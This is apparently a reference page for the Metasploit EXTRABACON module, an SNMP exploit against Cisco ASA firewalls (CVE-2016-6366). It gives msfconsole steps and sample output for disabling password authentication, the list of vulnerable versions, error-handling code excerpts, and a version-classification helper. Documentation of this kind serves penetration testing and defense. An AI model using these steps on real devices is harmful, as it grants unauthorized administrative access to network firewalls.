Cisco ASA Authentication Bypass (EXTRABACON) - Metasploit
This page contains detailed information about how to use the auxiliary/admin/networking/cisco_asa_extrabacon Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
Source code: modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2016-6366
This module is also known as EXTRABACON.
This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > show targets
... a list of targets ...
msf auxiliary(cisco_asa_extrabacon) > set TARGET target-id
msf auxiliary(cisco_asa_extrabacon) > show options
... show and set options ...
msf auxiliary(cisco_asa_extrabacon) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
General notes
This module uses improved shellcode with fewer stages than the Equation Group version, which makes it more reliable and makes the SNMP payload packet roughly 150 bytes smaller. The leaked version only supports 8.x; this module also works on 9.x versions.
More details, additional version-specific offsets, and a Lina file offset finder are available at:
https://github.com/RiskSense-Ops/CVE-2016-6366
Partial list of supported versions
All of the leaked versions are available in the module.
- 8.x
  - 8.0(2)
  - 8.0(3)
  - 8.0(3)6
  - 8.0(4)
  - 8.0(4)32
  - 8.0(5)
  - 8.2(1)
  - 8.2(2)
  - 8.2(3)
  - 8.2(4)
  - 8.2(5)
  - 8.2(5)33 *
  - 8.2(5)41 *
  - 8.3(1)
  - 8.3(2)
  - 8.3(2)39 *
  - 8.3(2)40 *
  - 8.3(2)-npe * **
  - 8.4(1)
  - 8.4(2)
  - 8.4(3)
  - 8.4(4)
  - 8.4(4)1 *
  - 8.4(4)3 *
  - 8.4(4)5 *
  - 8.4(4)9 *
  - 8.4(6)5 *
  - 8.4(7) *
- 9.x
  - 9.0(1) *
  - 9.1(1)4 *
  - 9.2(1) *
  - 9.2(2)8 *
  - 9.2(3) *
  - 9.2(4) *
  - 9.2(4)13 *
* New version support, not part of the original Shadow Brokers leak.
** We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE (No Payload Encryption) images are very rare (they exist for export to places with encryption restrictions), but in the future we'd like to incorporate these versions, perhaps as a bool option.
Verification Steps
- Start msfconsole
- use auxiliary/admin/networking/cisco_asa_extrabacon
- set RHOST x.x.x.x
- check
- run
- ssh [email protected], you will not need a valid password
- set MODE pass-enable
- run
- ssh [email protected], ensure fake password does not work
Scenarios
Checking for a vulnerable version
msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(cisco_asa_extrabacon) > check
[+] Payload for Cisco ASA version 8.2(1) available!
[*] 192.168.1.1:161 The target appears to be vulnerable.
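The check above keys the module's offset table on the exact version string it reads over SNMP, and reports "Detected" rather than "Appears" for any version outside that table. As an added example (not the module's own code), the following Python helper is a defensive inventory check: it parses ASA version strings the way they appear in the list on this page, classifies each against that list, and separately flags 8.3(2), where the notes say an NPE build cannot be told apart over SNMP. The sysDescr format ("... Version 9.2(4)13") is an assumption.

```python
import re

# Versions this page lists as carrying offsets in the module. Entries the page
# marks "*" are post-leak additions; 8.3(2) also has an "-npe" variant whose
# offsets the page says are commented out.
LEAKED = {
    "8.0(2)", "8.0(3)", "8.0(3)6", "8.0(4)", "8.0(4)32", "8.0(5)",
    "8.2(1)", "8.2(2)", "8.2(3)", "8.2(4)", "8.2(5)",
    "8.3(1)", "8.3(2)", "8.4(1)", "8.4(2)", "8.4(3)", "8.4(4)",
}
POST_LEAK = {
    "8.2(5)33", "8.2(5)41", "8.3(2)39", "8.3(2)40", "8.4(4)1", "8.4(4)3",
    "8.4(4)5", "8.4(4)9", "8.4(6)5", "8.4(7)", "9.0(1)", "9.1(1)4",
    "9.2(1)", "9.2(2)8", "9.2(3)", "9.2(4)", "9.2(4)13",
}
NPE_AMBIGUOUS = {"8.3(2)"}  # an NPE build reports the same SNMP version string

# ASA versions look like 9.2(4)13: major.minor(maintenance)[interim]
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\((\d+)\)(\d+)?")

def parse_asa_version(text):
    """Return (major, minor, maint, interim) from free text such as an SNMP
    sysDescr (assumed format: '... Version 9.2(4)13'), or None if absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, maint, interim = m.groups()
    return (int(major), int(minor), int(maint), int(interim or 0))

def canonical(v):
    """Render a parsed tuple the way the module keys its offset table."""
    major, minor, maint, interim = v
    return f"{major}.{minor}({maint})" + (str(interim) if interim else "")

def classify(text):
    """Mirror the module's check: only an exact table hit means a payload
    exists; any other recognised version is merely 'detected'."""
    v = parse_asa_version(text)
    if v is None:
        return "unknown"                     # version could not be retrieved
    key = canonical(v)
    if key in NPE_AMBIGUOUS:
        return "payload-available-unless-npe"
    if key in LEAKED:
        return "payload-available"
    if key in POST_LEAK:
        return "payload-available-post-leak"
    return "detected-no-payload"             # CheckCode::Detected equivalent

if __name__ == "__main__":
    # Constructed sysDescr-style strings, not captured from real devices.
    for s in ("Cisco Adaptive Security Appliance Version 8.2(1)",
              "Cisco Adaptive Security Appliance Version 9.4(1)"):
        print(s, "->", classify(s))
```

A "detected-no-payload" result means only that this module carries no offsets for that version, not that the device is unaffected.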
Disabling administrative password
msf auxiliary(cisco_asa_extrabacon) > set
set ACTION set ConsoleLogging set Prompt set RHOST set TimestampOutput
set CHOST set LogLevel set PromptChar set RPORT set VERBOSE
set COMMUNITY set MODE set PromptTimeFormat set SessionLogging set VERSION
set CPORT set MinimumRank set RETRIES set TIMEOUT set WORKSPACE
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
set MODE pass-disable set MODE pass-enable
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
MODE => pass-disable
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed
Re-enabling administrative password
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
MODE => pass-enable
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-enable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[*] Auxiliary module execution completed
Msfconsole Usage
Here is how the admin/networking/cisco_asa_extrabacon auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/networking/cisco_asa_extrabacon
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show info
Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Sean Dillon <[email protected]>
Zachary Harding <[email protected]>
Nate Caroe <[email protected]>
Dylan Davis <[email protected]>
William Webb <[email protected]>
Jeff Jarmoc <jjarmoc>
Equation Group
Shadow Brokers
Available actions:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
PASS_ENABLE Enable password authentication.
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ASAVER auto no Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1), 8.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 161 yes The target port (UDP)
TIMEOUT 1 yes SNMP Timeout
Description:
This module patches the authentication functions of a Cisco ASA to
allow uncredentialed logins. Uses improved shellcode for payload.
References:
https://nvd.nist.gov/vuln/detail/CVE-2016-6366
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
https://github.com/RiskSense-Ops/CVE-2016-6366
Also known as:
EXTRABACON
Module Options
This is a complete list of options available in the admin/networking/cisco_asa_extrabacon auxiliary module:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show options
Module options (auxiliary/admin/networking/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
ASAVER auto no Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1), 8.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 161 yes The target port (UDP)
TIMEOUT 1 yes SNMP Timeout
Auxiliary action:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
Advanced Options
Here is a complete list of advanced options supported by the admin/networking/cisco_asa_extrabacon auxiliary module:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show advanced
Module advanced options (auxiliary/admin/networking/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/networking/cisco_asa_extrabacon module can do:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show actions
Auxiliary actions:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
PASS_ENABLE Enable password authentication.
Evasion Options
Here is the full list of possible evasion options supported by the admin/networking/cisco_asa_extrabacon auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Error: Unable to retrieve version information
- Received Cisco ASA version <VERS_STRING>, but no payload available
- Don't forget to run PASS_ENABLE after logging in!
- set ACTION PASS_ENABLE
- Connection Error: Is the target up?
- SNMP Error: Request Timeout, Cisco ASA may have crashed :/
- SNMP Error: Version 2c is not supported by target.
- Error: No payload available for version <VERS_STRING>
- Error: <E.CLASS> <E> <E.BACKTRACE>
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Error: Unable to retrieve version information
Here is a relevant code snippet related to the "Error: Unable to retrieve version information" error message:
  def check
    begin
      vers_string = retrieve_asa_version
    rescue ::StandardError
      print_error('Error: Unable to retrieve version information')
      return Exploit::CheckCode::Unknown
    end

    if @offsets[vers_string]
      print_good("Payload for Cisco ASA version #{vers_string} available!")
Received Cisco ASA version <VERS_STRING>, but no payload available
Here is a relevant code snippet related to the "Received Cisco ASA version <VERS_STRING>, but no payload available" error message:
    if @offsets[vers_string]
      print_good("Payload for Cisco ASA version #{vers_string} available!")
      return Exploit::CheckCode::Appears
    end

    print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
    return Exploit::CheckCode::Detected
  end

  def build_payload(vers_string, mode)
    # adds offsets to the improved shellcode
Don't forget to run PASS_ENABLE after logging in!
Here is a relevant code snippet related to the "Don't forget to run PASS_ENABLE after logging in!" error message:
    response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])

    if response.varbind_list
      print_good('Clean return detected!')
      if action.name == 'PASS_DISABLE'
        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning(' set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
set ACTION PASS_ENABLE
Here is a relevant code snippet related to the "set ACTION PASS_ENABLE" error message:

    if response.varbind_list
      print_good('Clean return detected!')
      if action.name == 'PASS_DISABLE'
        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning(' set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
Connection Error: Is the target up?
Here is a relevant code snippet related to the "Connection Error: Is the target up?" error message:
        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning(' set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
SNMP Error: Request Timeout, Cisco ASA may have crashed :/
Here is a relevant code snippet related to the "SNMP Error: Request Timeout, Cisco ASA may have crashed :/" error message:
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
SNMP Error: Version 2c is not supported by target.
Here is a relevant code snippet related to the "SNMP Error: Version 2c is not supported by target." error message:
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e
Error: No payload available for version <VERS_STRING>
Here is a relevant code snippet related to the "Error: No payload available for version <VERS_STRING>" error message:
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e
    print_error("Error: #{e.class} #{e} #{e.backtrace}")
  ensure
Error: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error: <E.CLASS> <E> <E.BACKTRACE>" error message:
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e
    print_error("Error: #{e.class} #{e} #{e.backtrace}")
  ensure
    disconnect_snmp
  end

  def retrieve_asa_version
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13750 Merged Pull Request: Centralize networking
References
- CVE-2016-6366
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
- https://github.com/RiskSense-Ops/CVE-2016-6366
See Also
Check also the following modules related to this module:
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/cisco_dcnm_auth_bypass
- auxiliary/admin/networking/cisco_dcnm_download
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- auxiliary/admin/networking/arista_config
- auxiliary/admin/networking/brocade_config
- auxiliary/admin/networking/f5_config
- auxiliary/admin/networking/juniper_config
- auxiliary/admin/networking/mikrotik_config
- auxiliary/admin/networking/ubiquiti_config
- auxiliary/admin/networking/vyos_config
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/cisco_asa_asdm
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/http/cisco_device_manager
- auxiliary/scanner/http/cisco_directory_traversal
- auxiliary/scanner/http/cisco_firepower_download
- auxiliary/scanner/http/cisco_firepower_login
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/cisco_nac_manager_traversal
- auxiliary/scanner/http/cisco_ssl_vpn
- auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
- auxiliary/scanner/ike/cisco_ike_benigncertain
- auxiliary/scanner/misc/cisco_smart_install
- auxiliary/scanner/snmp/cisco_config_tftp
- auxiliary/scanner/snmp/cisco_upload_file
- auxiliary/voip/cisco_cucdm_call_forward
- auxiliary/voip/cisco_cucdm_speed_dials
Authors
- Sean Dillon <[email protected]>
- Zachary Harding <[email protected]>
- Nate Caroe <[email protected]>
- Dylan Davis <[email protected]>
- William Webb <william_webb[at]rapid7.com>
- Jeff Jarmoc <jjarmoc>
- Equation Group
- Shadow Brokers
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.